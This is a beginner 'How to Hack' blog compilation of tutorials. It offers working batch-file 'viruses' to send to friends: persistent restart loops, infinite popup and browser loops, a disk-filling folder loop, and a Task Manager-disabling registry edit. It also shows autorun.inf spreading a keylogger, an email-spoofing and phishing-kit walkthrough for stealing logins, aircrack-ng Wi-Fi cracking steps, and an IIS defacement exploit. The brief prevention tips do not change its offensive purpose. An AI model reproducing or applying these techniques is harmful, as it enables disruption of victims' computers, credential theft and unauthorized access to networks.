Hacking Tutorial

Hacking Tutorial
 














#Hacking: Be Hacker And Develop Your Own Virus

Read About Batch File And Develop Your Own Virus...Go Below Top To Floor For Be A Hacker...It's My Commitment You Have To Be Hacker After it.



Batch file Programming Tutorial – 1 | Batch file commands | Bat file commands

 








First Batch file Programming tutorial.You will know what are batch files and how to use batch file programming and batch file commands to create batch files.
In this post i am discussing about what are batch files, their uses and some basic batch file commands .

Q) What is a Batch file ?
A) A Batch file is script or a text file containing batch file commands to be executed by command interpreter. Its extension is .bat. Commands used in batch programming are general commands similar to commands that are used in CMD and are called Batch File Commands. It gives you full command over DOS.
Q) What are its uses?
A) Batch file can be used to club batch file commands  to complete a specific job like copying files/folders etc. It can also be used in developing Programs.
Q) How to make a Batch File ?
A) Batch files are quite simple to use. Just write the commands in notepad and save it as “anyname.bat” (without quotes).

Some Batch commands and their uses :

@echo off : The first batch file command which is to be used in almost all batch scripts. This command hides the processing of command in command interpreter.
Echo :This batch file command prints the text in command interpreter.
   >syntax :
echo hello
This batch file command will print “hello“[without quotes] in command interpreter.
XCOPY  : Copies Files/folder to another location .
 >Syntax :
xcopy “locationoffile” “destination”
This command will copy file which is at “locationoffile” to destination folder .
msg : Prints a message in a dialogue box.
 >Syntax :
msg * Put your message here.
This command will print “Put your message here. “ in a dialogue box.
mkdir : Makes new directory
 >Syntax :
mkdir howtohack
This command will make folder named “howtohack” [without quotes].
Pause : Pauses the batch program until user presses a key.
cd : change directory.
 >Syntax:
cd D:
This will change the working directory to drive “D” .

Batch Tutorial 2 : Create a Harmless virus

This tutorial is about using batch file commands to create a simple harmless virus to mess with your friend’s PC . Try to understand the Logic instead of mugging up the code . This is for educational purpose only , try at your own risk .

Tutorial :
open notepad and type the folowing code:-
________________________________
@echo off 
shutdown -r -t 100 -c “Maverick”
________________________________

Save it as any name with a .bat extension like *game.bat*
you can change “Maverick” with what ever message you want,You can also change “100“(in secs) with whatever time you want to restart.
Send this “game.bat” to your friends using a pendrive or by uploadig it to rapidshare/hotfile service.

LOGIC:-
.bat :- Files having these extensions are known as batch files containg commands to be executed by command interpreter.
@echo off :- this command turn off the command you put in your batch file.
-r – this parameter restarts the pc.You can also use “-s” (without quotes) to shutdown the pc.
-t :- this parameter specifies time in seconds.
-c :- this parameter is used to specify a message in the shutdown box.

Note :- To stop shutdown
Go to run and type  “shutdown -a” and click on “ok“.
This virus will not harm your computer , it will just turnoff/restart your pc.


Batch File Progamming – 3 | Startup Virus


 

 

 

 

 

 

 

How to create a Batch File

This tutorial is about batch file programming, How to code a bit harmful virus using batch file and How to prevent against this virus. Read this amazing post and don’t forget to leave your feedback in comments.



Batch file commands :

@echo off
shutdown -r -t 100 -c “maverick”
xcopy “filename.bat” “C:Documents and SettingsAll UsersStart MenuProgramsStartup” /y
____________________________________________________________
Save it as any name with a .bat extension but with name *filename.bat*
you can change “maverick” with what ever message you want, You can also change “100“(in secs) with whatever time you want to restart.
if you changes *filename.bat* to “othername.bat” then also changes the above code to
|| xcopy “othername.bat” “C:Documents and SettingsAll UsersStart MenuProgramsStartup” /y ||
Send this file to your friends using a pendrive or by uploadig it to rapidshare/hotfile service.

LOGIC:-

.bat- Files having these extensions are known as batch files containg commands to be executed by command interpreter.
@echo off –  This command is used to turn off the display of executing command in command console.
-r – This parameter restarts the PC.You can also use “-s” (without quotes) to shutdown the PC.
-t :- This parameter specifies time in seconds.
-c :- This parameter is used to specify a message in the shutdown box.
xcopy:- This command copies the file specified with double quotes “othername.bat” to the location specifies (in this case startup) with double quotes “C:Documents and SettingsAll UsersStart MenuProgramsStartup”
Startup:This folder contans files to be open when ever your computer boot ups.If you place a file here it will automatically open that file on every boot.
y :- This parameter asks the command prompt to overwrite the file
After running this virus, your PC will restart and again and so on..
only way to stop this mess is to directly plug off the switch from the power board.

Solution:

Open your computer in safe mode and permanently delete the batch file from the startup folder.

Batch File Programming Tutorial 4 | Some more advanced batch commands and viruses

This tutorial is continuation to my Batch File Programming series.
In this post we will discuss about Looping in batch files and how to use them to create horrible viruses!!
I will also discuss about how to change icon and convert .bat file to .exe file.
Steps :-
1) Open notepad and copy paste any of the following codes.
<<<<<<<<<<<<<< Code -01 >>>>>>>>>>>>>>>>
@echo off
:loop
msg * write your text here
goto loop
<<<<<<<<<<<<<< Code ends >>>>>>>>>>>>>>>
<<<<<<<<<<<<<< Code -02 >>>>>>>>>>>>>>>>
@echo off
:loop
start iexplore.exe www.anywebsite.com
goto loop
<<<<<<<<<<<<<< Code Ends >>>>>>>>>>>>>>>
<<<<<<<<<<<<<< Code -03 >>>>>>>>>>>>>>>>
@echo off
:loop
msg * Enter your text here
start iexplore.exe www.anywebsite.com
goto loop
<<<<<<<<<<<<< Code Ends >>>>>>>>>>>>>>>>
<<<<<<<<<<<<<Code -04>>>>>>>>>>>>>>>>>>
@echo off
xcopy “virusname.exe” “C:Documents and SettingsAll UsersStart MenuProgramsStartup” /y 
msg * Enter your text here
start iexplore.exe www.anywebsite.com
goto loop
<<<<<<<<<<<<<Code ends>>>>>>>>>>>>>>>>>>
2) Save the File as Anyname.bat , .bat extension is compulsory.
3) Download Batch to exe converter :-
http://download.cnet.com/Bat-To-Exe-Converter/3000-2069_4-10555897.html
4) Open Batch to exe converter.
5) Browse Your batch file.
6) You can choose the icon of the output file by :-
6.1) Go to versioninformations
6.2) Click on “….” button, that is the browse button and browse to your icon file.
7) After that click on compile.
8) Now your .exe virus is ready, now send it your friends have Fun .
For sending methods ,Refer these posts :-
Instead of keylogger.exe, use virusname.exe at all places in above tutorial.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! Logic !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
__________________
:loop
any batch command
goto loop
__________________
^ This syntax is called looping . Any command placed in place of “”any batch command“” will be executed infinite Times.
About codes:-
Code -01 : This code will execute infinite message boxes saying:
write your text here
Code-02 : This code will open a website www.anywebsite.com  infinite times in internet explorer.
Code -03 : This code will open both message and website, but execution order will be like this – first message box then web page then again message box and then again webpage, this will continue until system is restarted.
Code-04 : It is quite deadly as it will execute same as code-03 but will continue to execute even after system is restarted. Be careful while using this. The important thing you had to do is that you had to change virusname.exe with the name you are going to set to the final file.
About Commands:
msg * write your text here 
This command displays a text box containing the text which is specified after msg *  .Replace the write your text here  with whatever you want to appear in msg box.
start iexplore.exe www.anywebsite.com
^ This command will open www.anywebsite.com in internet explorer.You can change www.anywebsite.com with what ever website you want to open after execution of the virus.
xcopy:- This command copies the file specified with double quotes “virusname.exe” to the location specified (in this case startup) with double quotes “C:Documents and SettingsAll UsersStart MenuProgramsStartup” . Make sure the final file should have a name “virusname.exe” .
Startup : this folder contans files to be open when ever your computer boot ups.
if you want any file to open whenever your computer opens, just place that file in this folder and this will automatically open that file on every boot.
y :- This parameter asks the command prompt to overwrite the file

Batch File programming tutorial 5 – Batch file directory maker virus

I have been posting about batch file programming from quite long. Batch file programming is very useful and easy. You can use these files with any other programming languages too.
Do read all of my batch programming tutorials to get a better understanding of batch files and batch file programming.
Here is my next tutorial about batch programming. In this programming tutorial I will teach you how to create a folder creator virus using batch programming.

Batch File Coding

@echo off
mkdir howtohack
:loop
cd howtohack
mkdir howtohack
echo>batchprogramming.txt
echo Virus in your PC>>batchprogramming.txt
goto loop
Copy the command and paste in notepad and save as anything.bat
This virus will create infinite folders named howtohack and batchprogramming.txt file into the howtohack folder until the disk is exhausted.

Explanation :

mkdir : this command is used to create new folder .
cd : This command is used to change the current directory .
echo >batchprogramming.txt : This command creates a new file “batchprogramming.txt”
echo text >>batchprogramming.txt : This command writes the text specified after
the echo command to text.txt file.
:loop
commad
goto loop
^^^ looping statement in batch files. In this statement you can replace command with any number of batch file commands.


How to create a Task Manager disabling virus | Disable Task Manager

How to Create a task manager disabling virus

In this tutorial I am going to teach you how to create a Task Manager Disabling virus. This virus will disable Task manager using Registry Editor i.e. regedit. Read this post and post your feedback in comments. Do share this page with your friends help us to grow !

Steps:-

1)Copy the fllowing code to a batch file :-
@echo off
REG add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f
2) Save it as anyname.bat.


Explanation:-

1)REG add -it used to add registry to the windows.
2)HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem :- path of the registry
3)REG_DWORD :- data type
4)0: it is default value and means fasle. 1 stands for true.
if the dword value is0 the registry DisableTaskMgr is false andtask manager will work.
if the dword value is 1 the registry DisableTaskMgr is true and task managaer will be blocked.
5)So just change 0 and 1 to enable/disable the task manager.

What is Autorun.inf and how to use it ? | Autorun.inf Virus


This tutorial is about using autorun.inf file to spread keylogger/rat via pendrive or another removable device. A detailed tutorial about autorun virus. Read this post carefully and don’t forget to leave your feedback comments in.
In windows XP it will automatically execute the instructions while in other versions of windows it will ask the user .



Q)what is autorun.inf ?

A) Autorun.inf file is a simple text file containing list of instructions to be followed by the Operating System. Whenever a CD/USB is plugged in, the system searches for this autorun file, and if found it executes all the instructions present in this file.

Q) Why it is used?

A) It is used to execute files automatically whenever a CD/Usb is plugged in. It can also change the icon of the usb/cd drive .

Steps:-

1) Creating autorun.inf :-
1.a) Open notepad and copy the followig code to it.
[autorun]
open=autorun.bat
icon=anything.ico
Here autorun.bat is the file we want to execute when our CD/USB is inserted.
Anything.ico is the name of icon file we want to set to our CD/USB drive.
2) Creating autorun.bat :-
2.a) Copy the following code [Edit it accordingly] @echo off
start /location of the keylogger
Ex 1 :- If it is saved in a folder named rishabh which is present in the root directory of CD/USB. Then the code should be edited like this
@echo off
start rishabh/keylogger.exe
Ex 2 :- If the keylogger is placed in theroot directory then the code should be like this :-
@echo off
start keylooger.exe
2.b) Save it as autorun.bat and place it in the root directory of the CD/USB.
3) Give this CD/USB to your friends and when they will insert this in their systems, the will be infected with your keylooger.

Disabling Autorun :

1) Go to RUN and type gpedit.msc and hit ok.
2) Browse toComputer Configuration >>Administrative Templates >> Windows Components >>Autoplay Policies .
3) In details pane, double-click Turn off Autoplay.
4) Click Enabled, and then select All drives in the Turn off Autoplay box to disable Autorun on all drives.

C Plus Plus programming tutorial | Basics of C++

This tutorial is about C++ Programming language. I will teach C++ from very basics to advanced level in this post and upcoming posts. Just wait and read all the posts regularly.
This tutorial is mainly about theoretical knowledge but is very important!
Some Definitions :
  •  Bit : It is the smallest unit a computer can understand. it is either 0 or 1. 0 generally means circuit is OFF and 1 means ON.
  • ASCII : All characters on keyboard have a code which is known as ASCII code.
    Range A-Z  ->  65-90
    a-z  ->  97-122
  • Byte : Group of 8 bits. 1 byte means 1 character.
  • Program : It is a step by step instruction which tell what to do and how to do.
  • Object Code : A program which a machine can understand is called Object Program.\
Compiler : 
A program which converts source code[ English like step wise instruction to computer] to object code[language which a machine can understand].
IT executes the entire program at once and hence It is faster.
Interpreter :
A program which converts source code[ English like step wise instruction to computer] to object code[language which a machine can understand]. But the interpreter executes the program line by line and hence it is slower.
Constants : 
Integer Constant :
  • Consist of 0-9
  • Doesn’t includes commas or spaces.
  • Preceded by a + or – sign. + sign is assumed if there isn’t any sign.
Character constants : Any single character enclosed in single quote (‘). Ex :- ‘a’ ,  ‘b’ .
Strings : Generally consist of more than one character within double quote (“).
Ex: “comp”, “abcd”.
Difference between String and Character :
Character constant takes 1 byte for storage while string constant takes 2 bytes for storage because in String  a byte is reserved for Null Byte.
Memory representation : 
Character : ‘A’    ==   |A| << stored in one memory cell
String : “A”  ==  |A|\0|  << stored in 2 memory cells with \0 as a NULL byte.
Variables in C++ : These are the tokens that are identified by identified by an identifier and change the value during execution.
Ex : int a=5;
a=a+3;
cout<<a;
Here a is a variable. The initial value of a was 5 but it was then changed to 8 by command a=a+3 .

What are cookies and their importance in security

Cookies are tasty, sweet and I have them daily in the evening with my coffee. Well, if that’s the cookie you think we would cover today in our article then you my friend are at the wrong place.
Today we will discuss about Internet cookies and their importance from a security view point. An internet cookie is not the complex beast that has been made out of it by media, online publications and other websites.
In its simplest form a cookie is just a text string that any server stores on the user’s local storage (hard disk) just to be retrieved later. All the information in cookies is stored in the form of name-value pairs.
Those people who use Internet Explorer to surf the internet can easily browse their cookies using the Windows Explorer. Mostly the cookies are located at
C:\Documents and Settings\User name\Local Settings
or a similar directory inside the system32 folder on the C drive. Other browsers store their cookies inside their installation directories, some of the common ones are:
Cookie storage location for Chrome -
C:\Documents and Settings\<user name>\Local Settings\Application Data\Google\Chrome\User Data\Default\Cookies
Cookie storage in Firefox is done in a text file which contains all the cookies. They are stored in this location :
C:\Documents and Settings\Windows login/user name\Application Data\Mozilla\Firefox\Profiles\profile folder
A cookie can store relatively less data to large amounts of data. The simplest of cookies store just a simple user id. While relatively complex cookies store a user id, separate session id, time for session initiation and a lot of other values which could include your login data and maybe other relevant information too.

Misconceptions about cookies:

One common doubt about cookies is that they can use our system or work as an application but it is not true. Cookies stored on our system can’t draw information from other cookies. They are just in place to be retrieved by the web server to communicate with the current activity status of the user. Any website can retrieve only the cookies that it has created on our system.

The different types of cookies:

Cookies are of two different types based upon their nature.
A cookie can be either:
1.)    Session cookie:  A session cookie remains live until the user closes their browser. A session cookie stores the current information of the user such as main user id. Apart from this a session cookie has a very limited life and expires as soon as the web browser is closed fully.
2.)    Persistent cookie: A persistent cookie is one which stays on the system even after closing the browser. Persistent cookies can only be deleted manually or after they reach the set expiration time which is assigned to them. Once these cookies expire then the user has to generate fresh cookies with the required levels of authentication.
3.)    First party cookies: These cookies are generated from the same site that we are currently on. They store relevant user data for making the surfing experience personalized and easy.
4.)    Third party cookies: These cookies are often generated by advertising websites (like the doubleclick dart cookie by Google), they track user’s activity across pages in order to show them targeted ads. While this may seem like a breach of privacy, it’s still acceptable as highly sensitive data is not tracked.

Threats from cookies:

With the rise in malicious programs and adwares, malwares the risk from rogue cookies is much high these days.
Malicious cookies can track our online activities and they build a web profile of the user based upon the surfing habits and pages visited by the user. But most of the users with good antivirus and firewall programs should not worry about such malicious cookies as they will be automatically flagged before causing any damage.

What is cookie stealing?

Cookies are used to store session data and sometimes important information like login data etc is accessible through cookies stored in a user’s system.
Cookie stealing is essentially exploiting a computer session (the session key) for obtaining access to web services on a user’s system or information stored on it.
Cookie stealing can be done via various methods, few of which are:
1.)    Cross- site scripting: This involves running code on the user’s computer by fooling it to accept it as coming from a verified source. This allows the person initiating the stealing to get a copy of the cookies on the user’s system.
2.)    Session key stealing: An attacker who has physical access to a system can steal session key by having access to the file system on the user’s computer or the appropriate server.
3.)    Using packet sniffing (session side jacking): Packet sniffing can be used to read the traffic between two different information systems for stealing the session cookie.
4.)    Session fixing: This involves manipulating the user’s session id to one that is known to us by making them click on a malicious link containing our desired session id. Then once the user logs in, we get the sensitive information.
So guys this was everything you would need to get started with cookies, cookies are fun. They are everywhere on the web and they can steal your private information when not taken care of.

How to send an anonymous email | Create fake email sender

Hi guys! I am back with another amazing and mind blowing tutorials for my reader. In this tutorial I am going to explain you how to send an anonymous email to someone. You must be thinking what is the purpose to send an anonymous email, I will be explaining that too in this detailed post.

What is Email Spoofing?
Email Spoofing is a process of faking source address of an Email. It means that we can show that email has been sent from someone else. This could be quite useful in various client side hacking techniques and is an important part of Social Engineering.
Using Email Spoofing techniques you can send fake emails to users to win their trust in order to execute our attack. Since the source address will be fake(Probably a mail from some famous trusted company) our victim will believe the mail and will be hacked.
Example use of Email Spoofing :
You can create a Facebook password change form having looks similar to that of Facebook, after that you send the link of the online form to the victim by spoofing the source address as of Facebook like password@facebook.com or something like that. This way user will believe that the mail is from Facebook and will surely enter his credentials.
 

How to send an anonymous mail :

Now let us discuss about the actual steps involved in sending anonymous or fake mails.
1) You first need an fake email sender. You could either use some online fake email sender like :
This content is locked!

Or You could even create your own Fake email sender.
2) To create Your own Email account Spoofer you need following things :
2.1) Fake Email Sender script : This script is a PHP mail script using which we can change the source address of an email. Download it from here.
2.2) Free hosting service : You need a hosting service in order to host the PHP mail file. There are many free hosting services which provides a free domain too. We will use some free service like x10hosting.com. Create an account there an upload your php file there. Your link will be username.x10hosting.com/mail.php.
You could also try some other free web hosting service like :
phpnet.us
0000webhost.com
zymic.com
3) So now you have your own Fake Email sender. You now have to use this script to send fake emails to your victim.
4) In receiver’s address add the email id of your victim.
5) In sender’s address add the email of some reputed company like contact@facebook.com or something like that.
6) Enter a legit looking subject and message in order to make the victim believe in our email. Just click on send button after that. Your victim will the receive a email from contact@facebook.com
Chechout the image for information :

7) You can use the same way to send fake mails from any Email ID to any other Email ID.
So far we have discussed about how to send an anonymous email. Now I will tell you how you can distinguish between original and fake emails to prevent yourself from frauds. You can check the emails you doubt using the following to check whether their source is legit or not.
To check Email source follow these steps :
1) Open the email you want to check whether it is fake or not.
2) Open the Email header for that Email. To open headers for an email click on “Show headers” or “Show original” ( depends on the email service you are using).
3) There you will see a field of “received from : “, You will see a IP address against that field.
4) Copy the IP Address and trace its location.( Will explain tracing location too in my next post.)

Phishing attack tutorial | What is Phishing | Phishing scam

In this Tutorial I am discussing the easiest way of hacking an Email account ie Phishing scam . Definition of phishing, what is a phishing scam, how it works and how to hack an email account using phishing scam more efficiently.
Phishing scam is one of the easiest and the oldest way of hacking an email account. All beginner hackers should know about this.
Read this post carefully and leave your Feedback and queries in comments .


Q) What is Phishing?
A) In simple language phishing scam is creating fake pages to steal user credentials like username,password,phone no,etc.


Steps:-
1) First you need a Phisher. Phisher is a set of files used to fool someone .It consist of:-
i) Web page which appears to be same as that of victims account site.
i) A php script which posts the data (credentials)into a text file
iii) Text file in which credentials are saved.

2) Creating a Phisher?
2.1) Creating exact copy of the login page of site: Open that site in your bowser ,rightclick any where in free space and then click on view source.
2.2) Copy the entire source to notepad.
2.3)Editing source code :
Press“Ctrl+a” then “ctrl+f” (select all+find ) , then a dialogue box will appear , type “action”(without quotes) and press enter.
The word action will be highlighted in the notepad.You will then be having a line saying:
**action=”http://www.facebook.com/login.php?login_attempt=1″**
2.4)Change this with **action=”post.php”**(double quotes are necessary),and save
it as index.html.
2.5)Creating a Phishing script :
This content is locked!

Unlock the above link,Visit the link and copy the code to notepad and change
**’Location:http://www.myhost.com/errorpage.html’**
with the url of the site you want to open after victim presses “Login” button like if you want your victim to be redirected to yahoo.com change **‘Location:http://www.yahoo.com/’**
and save it as “post.php”.
2.6) Create a log file: It is a file which contains all usernames and passwords . Open
notepad and save it as **usernames.txt**.
3) Now you need a free web hosting account .you can easily find some free hosts on google or try these:-
zymic.com
t35.com
my3 gb.com
Create account on any of these sites for free hosting plan.
4)After creating account just upload the three files to your web hosting account.
5)You are ready for the attack.Just send the link of your index.html to the victim.
If he opens and tries to login , id and password will be saved in the usernames.txt file.

6) Additional step:
You can hide URL by encrypting it using online URL encrypters like
is.gd
goo.gl
tinyurl.com
Go to any one of the above mentioned sites, enter your URL and
then it will encrypt the URL , copy the encrypted URL and then send it to Your Friends.

Logic:
Index.html : It is the exact copy of the Login page of a site.While editing it , we change “action=post.php” so when ever victim clicks on the Login button , Post.php will be executed.
Post.php: It is our phishing script, it takes the data and writes it to a text file , and then loads another page specified by the “location” tag in Php file.
usernames.txt : text file containing Passwords and Email id.

Prevention :
>Always check the Url before signing in . This is the most useful and effective way one can use to prevent himself from phishing .
>Other way is to use some good Antivirus software which warns you whenever you visit a harmful site.
Even if somehow you entered your credentials in a phisher, Immediately Change your password .

Basics of Ethical hacking | How to hack an email account

Hey Readers ! In this post I am discussing the very basic ways about how to hack an email account, how to hack hotmail password, gmail accounts, facebook accounts and Prevention against these attacks.
Many beginners ask me question how to hack facebook accounts or how to hack hotmail password or that .
But before learning the actual procedure you should know about different types of attacks, their working and prevention against these hacking attacks.

1) Phishing :
>The first and very basic way of hacking an email account is Phishing. Phishing is basically creating fake web pages to steal victim’s important information like email,passwords,phone no,etc.
DRAWBACK :
>Users nowadays are aware of these type of attacks and one cant be easily tricked using this attack . You need some social engineering to trick someone.
Prevention :
>Always check the Url before signing in . This is the most useful and effective way one can use to prevent himself from phishing .
>Other way is to use some good Antivirus software which warns you whenever you visit a harmful site.
Even if somehow you entered your credentials in a phisher, Immediately Change your password .
2) Keylogging :
>This is really good way of Hacking an Email account. In this type of attack Hacker simply sends an infected file having keylogger in it to victim. If the victim executes that file on his pc , whatever he types will be mailed/uploaded to Hacker’s server. The advantage of this attack is that the victim won’t know that Hacker is getting every Bit of data he is typing. Another big advantage is that Hacker will get passwords of all the accounts used on that PC.
DRAWBACK :
>Keyloggers are often detected by good antivirus. Hacker must find a way to save it from antivirus.
Prevention :
>Execute the file only if you trust the sender.
>Use good antivirus and update it regularly .
3) Trojans/backdoors :
>This is a advanced level topic. It consists of a server and a client. In this type of attack the attacker sends the infected server to the victim. After execution the infected server ie Trojan on the victim’s PC opens a backdoor and now the Hacker can do whatever he wants with the victim’s PC.
DRAWBACK :
>Trojans are often detected by good antivirus . Hacker must find a way to save it from antivirus.
Prevention :
>Execute the file only if you trust the sender.
>Use good antivirus and update it regularly .
4)Session hijacking:-
>It consists of stealing session cookies. In this type of attack an attacker can steal victim ‘s session cookies and can login as the victim . Another way of stealing cookies is sniffing on the lan network using some softwares like Cain and able, wireshark ,etc.
DRAWBACK :
>If user is logged out then attacker is also logged out and the session is lost.
Prevention :
>Never open untrusted links.

What is Ethical hacking | Different Types of Hackers | Ethical Hacking Certification

Hi guys, this is very important post for all those who want to learn ethical hacking or want ethical hacking certification.This post will cover different aspects of hacking, different type of hackers and the methodologies they follow, their mindset and their working. This post will give you a introduction about how to be a hacker and how to get proper ethical hacking training.

What is Ethical Hacking?
Ethical Hacking is process of finding and exploiting vulnerabilities in a system and then rectifying them to protect them from other hackers. Person performing ethical hacking is person who has ethical hacking certification and holds good knowledge about computers, networks, programming and various vulnerabilities. His work is to secure his own network and protect it from all sort of cyber attacks.


Types of Hackers based on their knowledge :
Coders :
Coders are real hackers. They are programmers having immense knowledge about many programming languages, networking and working of programs. They are skilled programmers who can find vulnerabilities on their own and create exploits based on those vulnerabilities. They can code their own tools and exploit and can modify existing tools according to their use.
You have to learn programming from basic to advanced level to be a coder.
Admins :
These are the computer guys who are not sound enough in programming but holds enough information about hacking and networking. These guys have Hacking certifications and can hack any system or network with the help of tools and exploit created by codes. Majority of security consultants fall in this group. They are Certified Ethical Hackers who are trained for securing networks.
Script kiddies :
This is the most dangerous type of hackers. These type of hackers does not actually know what they are doing. They just use the tools and partial knowledge they gain from internet to attack systems. They do it just for fun purpose and to be famous. They use the tools and exploits coded by other hackers and use them. They have minimum skills.
Types of Hackers based on their motive of hacking :
White Hat Hackers :
White hat hackers are ethical hackers with some certifications such as CEH( Certified Ethical Hacker). They break into systems just for legal purposes. Their main motive is to find loopholes in the networks and rectifying them. These type of hackers work with famous companies in securing their systems and protecting them against other hackers.
Black Hat Hacker :
A black hat hacker may or may not have any hacking certification but they hold good knowledge about hacking. They use their skills for destructive purposes. They break into systems and networks either for fun or to gain some money from illegal means. They gain unauthorized access and destroy/steal confidential data or basically cause problems to their target.
Gray Hat Hacker :
A grey hat hacker is a combination of a Black Hat and a White Hat Hacker. A Grey Hat Hacker may surf the internet and hack into a computer system for the sole purpose of notifying the administrator that their system has been hacked. Then they may offer to repair their system for a small fee.
CEH or Certified Ethical Hacking is a certification exam every hacker must give in order to certify that he is a trained hacker. CEH is conducted by Ec-council. You can have the examination test by registering at their site. The CEH certification is famous all over the world. They provide training camps for this camp or you can train yourself by learning hacking from sites like How to hack or by joining some local institutions that provide CEH courses. A person having this certification could easy get a job in IT Security sector. If your desire is to be a good hacker then this certification is a must have thing for you.
So now you know about different types of hackers and their working. I will be back with another post about how they actually hack into system. Stay tuned and keep visiting How to hack to Learn Ethical Hacking.

Best Book to Learn Hacking – The Book of Hackers

Hi readers, it has been more than 2 years since How to Hack was launched and every now and then I keep getting requests by our readers about ethical hacking ebooks and tutorials to learn ethical hacking.
So some highly trained hacker friends of mine got together to write an amazing ebook to teach ethical hacking. This is one of the best and most advanced ethical hacking guide till date. We wanted to really teach others what actually hacking is and how they can become hackers.
he Book of Hackers is written keeping in mind all the Latest Hacking Techniques. No matter if you are a beginner in Hacking or an Pro Hacker practicing hacking since long, this book has something for all.

Here is a small insight of topics covered in the Book of Hackers – The Best Ethical Hacking Book.
a) Basics of Hacking
b) History of Hacking
c) Myths of Hacking
d) Advance Tools used for Hacking
e) Windows Hacking
f) Linux Hacking
g) Wifi Hacking
h) BackTrack And Metasploit
i) Advance Hacking Techniques
j) Hacking 101 – Some unknown / untold hacking secrets
i) A lot more
We are preparing another version of this book which will be even more advanced than this one. Version 2 of this book will soon be launched in the market, meanwhile you can buy a copy of this one and start learning hacking today. Version 1 is very important to start with because you will get to know very basics of hacking which even some pro-hackers aren’t aware of.
Get your copy of Book of Hackers from here and start learning hacking today!
BONUS: 1 our of every 50 people purchasing the Book of Hackers will get a chance to interact

How to Hack a Wi-Fi Password | Crack Wi-Fi Passwords Easily

Hi Guys, I am back with another amazing hacking tutorial. I hope you are learning well from my other posts. In this post I will be teaching you How to Hack a Wi-Fi password. The following post will teach you how to crack wifi passwords easily in minutes.
We strictly advise our readers to follow the tricks and tutorials presented at How to Hack at their own risk. We are sharing this knowledge for educational purpose only, well most of it! Blah Blah blah..
Phew! Done with the formalities, now let us start with the Wi-FI cracking. But before starting the tutorial let me give you a small introduction to what Wi-Fi hacking is and what are the security protocols associated with it.
In a secured wireless connected the data on internet is sent via encrypted packets. These packets are secured with network keys.

There are basically 2 types of security keys :
WEP( Wireless Encryption Protocol) : This is the most basic form of encryption. This has become an unsafe option as it is vulnerable and can be cracked with relative ease. Although this is the case many people still use this encryption.
WPA( Wi-FI Protected Access) : This is the most secure wireless encryption. Cracking of such network requires use of a wordlist with common passwords. This is sort of brute force attack. This is virtually uncrackable if the network is secured with a strong password
So lets begin the actual Wifi Hacking tutorial!
In order to crack wi-fi password, you require the following things :
1) A Desktop or Laptop having a Wireless Adapter
2) Backtrack Live DVD : This DVD is used to boot into backtrack OS, Backtrack OS is a hacking OS and will be used in my further hacking tutorials that is why I am asking to download it. It can be downloaded at : Download Backtrack to hack wifi Passwords
3) Brain! ( The most important part)
These are the things you require now let us proceed with the steps to crack wifi passwords easily.
1) Download the Backtrack OS ISO image and burn it to a DVD. Boot from that DVD ( Insert that DVD into CD-ROM and restart your PC.) You will see backtrack starting. Choose “Backtrack Default text version”. After that it will start executing some commands. Wait till you see something like in the following screenshot :

You will see root@bt:’# , Type startx and hit enter.
The color of the screen will be different as the screenshot is of the earlier version of backtrack. You will get a red-black screen of backtrack. Wait for few minutes, after it is done, you will get a desktop like version of backtrack.

Now Open the Konsole from the taskbar, Click on the icon against the dragon like icon in the taskbar in the above screenshot.
You will have a Command Prompt like Shell.
2) Type airmon-ng and hit Enter. You will have a screen like this, note down the name of interface, in our case the the name is wlan0.

3) Now type ifconfig wlan0 down and hit enter.
This command will disable your wireless adapter, we are doing this in order to change your MAC address.
3) Now type ifconfig wlan0 hw ether 00:11:22:33:44:55 and hit enter.
This command will change your MAC address to 00:11:22:33:44:55 in order to hide your identity.
4) Now type airmon-ng start wlan0 and hit enter.
This will start the network adapter in monitor mode. Note down the new interface name, it could be eth0  or mon0 or something like that.

The above command has started our network adapter in monitor mode as mon0,  note down this name.
5) After this type airmon-ng mon0 and hit enter
Replace the mon0 with interface name you discovered in step 4. This command will show you the list of available networks. Press Ctrl+C to stop the airmon to search for more networds. Copy the BSSID of the wireless network which you want to hack.

 In the above screenshot there is a list of available networks, Choose 1 network and note the BSSID andchannel of it.
6) Type airodump-ng -c channelno –bssid BSSIDN1 mon0 -w filename and hit enter.
Replace channelno and BSSIDN1 with the data from step 5. Replace the mon0 with network interface name from step 4. In place of filename write anyname and do remember that. Better use filename itself.
This command will begin capturing the packets from the network. You need to capture more and more packets in order to crack the wifi password. This packet capturing is a slow process.
7) To make the packet capturing faster, we will use another command. Open a new shell, don’t close the previous shell. In new shell type aireplay-ng -1 0 -a BSSIDN1 -h 00:11:22:33:44:55 mon0 and hit enter.
Replace the BSSIDN1 with the data from step 5 and mon0 from step 4. This command will boost the data capturing process.
The -1 tells the program the specific attack we wish to use which in this case is fake authentication with the access point. The 0 cites the delay between attacks, -a is the MAC address of the target access point, -h is your wireless adapters MAC address and the command ends with the your wireless adapters device name.
8) Now wait for few mins, let the DATA in the other console reach a count of 5000.
 The data in above screenshot is 1, wait for that to reach 5000.
9) After it reaches 5000, open another console and type aircrack-ng filename-01.cap and hit enter.
Replace the filename with the name you used in step 6. Add -01.cap to it. .cap is the extension of file having captured data packets.
After typing this command, aircrack will start trying to crack the Wi-FI password. If the encryption used is WEP, it will surely crack the password within few minutes.
In case of WPA use the following command instead of the above aircrack-ng -w /pentest/wireless/aircrack-ng/test/password.lst -b BSSIDN1 filename-01.cap
Replace BSSIDN1 and filename with data you used. /pentest/wireless/aircrack-ng/test/password.lst is the address of a file having wordlist of popular passwords. In case of WPA aircrack will try to brute force the password. As I explained above that to crack WPA you need a file having passwords to crack the encryption. If you are lucky enough and the network owner is not smart enough, you will get the password.
I hope that you will get what I have explained above, to make the explanation even more clear, I have made a sample video for you guys. I hope you will love this video, Unlock this video by liking/tweeting or following us on Google+ :
Well that is all for this Wi-Fi Cracking Tutorial. I hope now you will know how to hack a wifi password easily.

How to Hack websites using IIS exploit | IIS File Upload exploit

This tutorial is about website hacking that are working on older versions of IIS server. We will be discussing about what is a IIS server and how to upload deface pages on it.

 
Q) What is IIS Server ?
A) IIS [Internet Information Service] is a web server developed by Microsoft to use with Mircosoft Operating systems.

How to Use IIS exploit :-

For Windows XP :
1)Go to start the click on run.
2)Copy the folowing code and paste it in run command:-
%WINDIR%EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}::     {BDEADF00-C265-11d0-BCED-00A0C90AB50F}
3)Click on ok.
